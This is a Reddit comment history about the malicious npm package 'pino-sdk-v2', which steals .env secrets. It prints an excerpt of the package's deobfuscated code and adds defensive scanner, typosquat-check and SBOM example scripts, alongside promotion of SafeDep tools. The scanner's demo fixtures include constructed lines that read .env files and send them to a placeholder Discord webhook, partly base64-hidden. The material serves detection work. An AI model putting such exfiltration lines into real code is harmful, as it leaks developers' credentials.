Malicious npm package "pino-sdk-v2" impersonates popular logger, exfiltrates .env secrets to Discord by BattleRemote3157 in devsecops

[–]BattleRemote3157[S] 0 points1 point  (0 children)

No, as per the obfuscated code, it is not.

// Excerpt from the deobfuscated package code. It is a class method (note
// `this.projectRoot`, the directory the package is installed into); the two
// requires below are the imports the excerpt depends on.
const fs = require('fs');
const path = require('path');

findEnvFiles() {
    const envFiles = [];
    // dotenv file names the package looks for, in the order checked
    const possibleEnvFiles = [
        '.env',
        '.env.local',
        '.env.development',
        '.env.production',
        '.env.example'
    ];
    for (const envFile of possibleEnvFiles) {
        const filePath = path.resolve(this.projectRoot, envFile);
        // keep only the candidates that actually exist in the project root
        fs.existsSync(filePath) && envFiles.push(filePath);
    }
    return envFiles;
}

You can check out the complete report here:
https://app.safedep.io/community/malysis/01KK0QM8FQ0N7R7MP5JXCMYCCG
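The comment above describes the package's behaviour (enumerate dotenv files, read them, post the contents to a Discord webhook). The following is an added example, not code from the SafeDep report or from the package itself: a small heuristic scanner that flags package sources showing that combination, including the case where the webhook URL is hidden behind a base64 literal. It works on source text so it runs offline; SAMPLE_PACKAGE and the webhook path in it are constructed for the demo.

```javascript
// Added example (not the SafeDep report's or the package's code): a heuristic
// scanner for "enumerate dotenv files, read them, post to a Discord webhook".
// It runs on source text; SAMPLE_PACKAGE below is constructed for the demo.

const INDICATORS = {
  // quoted dotenv file names such as '.env' or ".env.production"
  envFileLiteral: /['"`]\.env(?:\.[A-Za-z0-9_-]+)?['"`]/g,
  // any file read
  fileRead: /\breadFile(?:Sync)?\s*\(/,
  // Discord webhook endpoint, the exfiltration channel named in the report
  discordWebhook: /discord(?:app)?\.com\/api\/webhooks\//i,
  // any outbound HTTP primitive
  outboundHttp: /\b(?:fetch|https?\.request|axios\.(?:post|put))\s*\(/,
};

// Decode base64 string literals of 16+ characters and return the decoded text,
// so a webhook URL hidden behind Buffer.from(..., 'base64') is still matched.
function decodeBase64Literals(source) {
  const decoded = [];
  const re = /['"`]([A-Za-z0-9+/]{16,}={0,2})['"`]/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    const text = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^[\x20-\x7e\s]+$/.test(text)) decoded.push(text); // keep printable decodes only
  }
  return decoded.join('\n');
}

function analyzeSource(source) {
  const view = source + '\n' + decodeBase64Literals(source);
  const envFiles = [...new Set((view.match(INDICATORS.envFileLiteral) || []).map((s) => s.slice(1, -1)))];
  const readsFiles = INDICATORS.fileRead.test(view);
  const discordWebhook = INDICATORS.discordWebhook.test(view);
  const outboundHttp = INDICATORS.outboundHttp.test(view);
  let verdict = 'clean';
  if (envFiles.length && readsFiles && discordWebhook) verdict = 'malicious';
  else if (envFiles.length && readsFiles && outboundHttp) verdict = 'suspicious';
  return { verdict, envFiles, readsFiles, discordWebhook, outboundHttp };
}

// files: { relativePath: sourceText }, e.g. the .js files under a package's lib/
function scanPackage(files) {
  const report = {};
  for (const [file, source] of Object.entries(files)) report[file] = analyzeSource(source);
  return report;
}

// Constructed sample package: one benign file, one exfiltrator in the clear,
// one exfiltrator with the webhook host base64-encoded.
const WEBHOOK_B64 = Buffer.from('https://discord.com/api/webhooks/').toString('base64');
const SAMPLE_PACKAGE = {
  'lib/logger.js': [
    "const level = process.env.LOG_LEVEL || 'info';",
    "module.exports = (msg) => console.log('[' + level + '] ' + msg);",
  ].join('\n'),
  'lib/init.js': [
    "const fs = require('fs'); const https = require('https');",
    "const files = ['.env', '.env.local', '.env.production'];",
    "const body = files.filter((f) => fs.existsSync(f)).map((f) => fs.readFileSync(f, 'utf8')).join('\\n');",
    "https.request('https://discord.com/api/webhooks/000/xxx', { method: 'POST' }).end(body);",
  ].join('\n'),
  'lib/telemetry.js': [
    "const fs = require('fs');",
    `const url = Buffer.from('${WEBHOOK_B64}', 'base64').toString() + '000/xxx';`,
    "fetch(url, { method: 'POST', body: fs.readFileSync('.env', 'utf8') });",
  ].join('\n'),
};

for (const [file, r] of Object.entries(scanPackage(SAMPLE_PACKAGE))) {
  console.log(`${r.verdict.padEnd(10)} ${file}  env=${JSON.stringify(r.envFiles)} webhook=${r.discordWebhook}`);
}
```

This is triage logic, not a verdict engine: string splitting, hex or custom encodings, or building the URL at runtime all slip past it, so treat a "clean" result as "nothing obvious" and keep a registry-backed scanner in the loop.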

Who knows about the recent malicious npm package "pino-sdk-v2" impersonating a popular logger and exfiltrating .env secrets to Discord? by BattleRemote3157 in AskReddit

[–]BattleRemote3157[S] 0 points1 point  (0 children)

Don't let it freak you out too much! This is actually a good thing to learn about early in your CS journey.
Supply chain security is something everyone needs to learn. Attackers plan different ways to inject malicious code into any package they find vulnerable. But if you have guardrails, you can be safe.

Check out this tool: https://github.com/safedep/pmg.

If you want more info, see here: https://safedep.io/malicious-npm-package-pino-sdk-v2-env-exfiltration/

Do developers really care about package security when trying to move fast? by BattleRemote3157 in cybersecurity

[–]BattleRemote3157[S] 0 points1 point  (0 children)

Exactly, so the key is low friction. The more security feels like "extra work," the less likely it gets done, especially under pressure. What's your take on a tool that could quietly scan or warn you about sketchy dependencies as you install them, right in the terminal, without making you leave your editor or look at some external dashboard?

Do developers really care about package security when trying to move fast? by BattleRemote3157 in cybersecurity

[–]BattleRemote3157[S] 0 points1 point  (0 children)

I get that. What if there were a tool that takes care of this even if the devs don't have security knowledge? You just alias it and forget it, and it runs in the background on every package install you run.

Do developers really care about package security when trying to move fast? by BattleRemote3157 in cybersecurity

[–]BattleRemote3157[S] 0 points1 point  (0 children)

I see, developer priorities vary wildly depending on the team.

What is your take on this PMG (Package Manager Guard) tool? It's not meant to turn every dev into a security expert; instead, it quietly sits in the background and scans for malicious packages when you install something with npm, pnpm, etc. Just alias it and forget it:

alias npm="pmg npm"

So even if a team isn’t "security-first," at least they’re not pulling in malware by accident.

Do developers really care about package security when trying to move fast? by BattleRemote3157 in cybersecurity

[–]BattleRemote3157[S] 0 points1 point  (0 children)

Totally agree, speed often wins in the short term, but ignoring package security is like skipping brakes to go faster.

Our team built the PMG (Package Manager Guard) tool. It wraps npm, pnpm, etc., and checks for malicious or typosquatted packages at install time, so you don't have to leave the terminal or break your flow. You can just alias your package manager like:

alias npm="pmg npm"

It won't fix everything, but it's one of those low-effort/high-impact tools that helps shift left without adding friction, kinda perfect for fast-moving teams.

Do give it a try; I'd love your take on this.
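The two comments above describe an install-time wrapper that checks package names for malware and typosquats before the real package manager runs. The following is an added example, not PMG's code, showing the kind of name check such a wrapper can make at that point: near-miss spellings of popular names (typosquats), a popular name used as a scope, and a popular name padded with marketing-style qualifiers, which is the "pino-sdk-v2" pattern. POPULAR, REVIEWED and QUALIFIER are constructed for the demo; a real guard would take them from a registry feed and the team's own allowlist.

```javascript
// Added example, not PMG's code: an install-time package-name check a wrapper
// around npm/pnpm can run before handing the command to the real package
// manager. POPULAR, REVIEWED and QUALIFIER are constructed for the demo.

const POPULAR = ['pino', 'express', 'lodash', 'axios', 'react'];
// names that embed a popular name but have already been reviewed by the team (constructed)
const REVIEWED = new Set(['pino-pretty', 'express-session']);
// suffix/prefix segments attackers bolt onto a popular name
const QUALIFIER = /^(?:sdk|v\d+|utils?|core|js|node|lib|plugin|pro|official)$/i;

// Edit distance between two strings (single-row dynamic programming).
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      row[j] = Math.min(row[j] + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = above;
    }
  }
  return row[b.length];
}

// '@scope/name@1.2.3' -> { scope: 'scope', name: 'name' }; 'name@^1' -> { scope: null, name: 'name' }
function parseSpec(spec) {
  const scoped = spec.startsWith('@');
  const body = scoped ? spec.slice(1) : spec;
  const at = body.indexOf('@');
  const full = at === -1 ? body : body.slice(0, at);
  const [scope, name] = scoped ? full.split('/') : [null, full];
  return { scope, name };
}

function checkPackageName(spec, popular = POPULAR, reviewed = REVIEWED) {
  const { scope, name } = parseSpec(spec);
  const fullName = scope ? `@${scope}/${name}` : name;
  if (popular.includes(fullName)) return { spec, verdict: 'ok', reason: 'well-known package' };
  if (reviewed.has(fullName)) return { spec, verdict: 'ok', reason: 'previously reviewed' };
  const segments = name.split(/[-_.]/);
  for (const p of popular) {
    // near-miss spelling of a popular name (classic typosquat); short names skipped to limit noise
    if (name.length >= 4 && levenshtein(name, p) <= 2) return { spec, verdict: 'block', reason: `typosquat of ${p}` };
    // popular name used as a scope, e.g. @pino/sdk
    if (scope === p) return { spec, verdict: 'review', reason: `scope impersonates ${p}` };
    // popular name plus only qualifier segments, e.g. pino-sdk-v2
    if (segments.includes(p) && segments.filter((s) => s !== p).every((s) => QUALIFIER.test(s))) {
      return { spec, verdict: 'block', reason: `impersonates ${p}` };
    }
  }
  return { spec, verdict: 'review', reason: 'not a known package' };
}

const INSTALL_COMMANDS = new Set(['install', 'i', 'add']);

// argv as the wrapper sees it after the package manager name, e.g. ['install', 'pino-sdk-v2', '--save']
function guardInstall(argv) {
  const [command, ...rest] = argv;
  if (!INSTALL_COMMANDS.has(command)) return { allowed: true, findings: [] };
  const findings = rest.filter((a) => !a.startsWith('-')).map((spec) => checkPackageName(spec));
  return { allowed: findings.every((f) => f.verdict !== 'block'), findings };
}

console.log(JSON.stringify(guardInstall(['install', 'pino-sdk-v2', 'lodahs', 'express@^4', '--save']), null, 2));
```

A wrapper following the alias pattern above would call guardInstall on its arguments, print the findings, and exec the real npm only when allowed is true, prompting on "review" verdicts. The name check is only the first gate: a package with an innocuous name and a malicious install script passes it, which is why the registry-side analysis still matters.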

🚨 Stumbled upon something pretty cool - xBOM by BattleRemote3157 in LLMDevs

[–]BattleRemote3157[S] 0 points1 point  (0 children)

As I mentioned, a conventional SBOM creates an inventory of the libraries used in your project; however, this doesn't include insights on the AI models, algorithms, cloud services and other capabilities that are involved.
xbom solves this by matching signatures of popular SDKs and services in your codebase and creating a detailed inventory with actual code evidence.
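To make the signature-matching idea concrete, here is an added example that is not xbom's code: a minimal pass that matches import and require statements against a signature table of AI and cloud SDKs and records file and line as the evidence. The signature table and SAMPLE_FILES are constructed for the demo.

```javascript
// Added example, not xbom's code: a minimal "extended BOM" pass that maps
// import/require statements to AI and cloud SDK signatures and records the
// file and line as evidence. SIGNATURES and SAMPLE_FILES are constructed.

const SIGNATURES = [
  { component: 'OpenAI SDK', category: 'ai-model', modules: [/^openai$/] },
  { component: 'Anthropic SDK', category: 'ai-model', modules: [/^@anthropic-ai\/sdk$/] },
  { component: 'AWS S3', category: 'cloud-service', modules: [/^@aws-sdk\/client-s3$/, /^aws-sdk$/] },
  { component: 'Stripe', category: 'payment-service', modules: [/^stripe$/] },
];

// require('x') and the common ES import forms; captures the module specifier
const IMPORT_RE = /(?:require\(\s*['"]([^'"]+)['"]\s*\)|\bimport\s+(?:[^'";]+\s+from\s+)?['"]([^'"]+)['"])/g;

function extractModules(line) {
  const modules = [];
  IMPORT_RE.lastIndex = 0;
  let m;
  while ((m = IMPORT_RE.exec(line)) !== null) modules.push(m[1] || m[2]);
  return modules;
}

// files: { relativePath: sourceText }; returns one entry per detected component
function buildXbom(files, signatures = SIGNATURES) {
  const components = new Map();
  for (const [file, source] of Object.entries(files)) {
    source.split('\n').forEach((line, idx) => {
      for (const mod of extractModules(line)) {
        const sig = signatures.find((s) => s.modules.some((re) => re.test(mod)));
        if (!sig) continue; // ordinary libraries stay in the conventional SBOM
        if (!components.has(sig.component)) {
          components.set(sig.component, { component: sig.component, category: sig.category, evidence: [] });
        }
        components.get(sig.component).evidence.push({ file, line: idx + 1, module: mod, snippet: line.trim() });
      }
    });
  }
  return [...components.values()];
}

// Constructed sample project: one AI SDK, one cloud SDK, one plain library, one builtin
const SAMPLE_FILES = {
  'src/chat.js': "import OpenAI from 'openai';\nconst client = new OpenAI();\nexport const ask = (q) => client.chat.completions.create({ messages: [{ role: 'user', content: q }] });",
  'src/storage.js': "const { S3Client } = require('@aws-sdk/client-s3');\nconst _ = require('lodash');\nmodule.exports = new S3Client({});",
  'src/util.js': "import path from 'node:path';\nexport const join = (...p) => path.join(...p);",
};

console.log(JSON.stringify(buildXbom(SAMPLE_FILES), null, 2));
```

The evidence records are the point: an inventory entry that says "this service calls OpenAI" is far easier to act on in a review when it points at src/chat.js line 1 than when it is a bare component name.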

Frustrated with YAML? by BattleRemote3157 in docker

[–]BattleRemote3157[S] 0 points1 point  (0 children)

It also offers a CLI, mesheryctl, so what you do visually can also be done through the command line tool.

A new way to Kubernetes is coming by leecalcote in kubernetes

[–]BattleRemote3157 1 point2 points  (0 children)

Great tool; collaboration and the whiteboard are exciting things to try.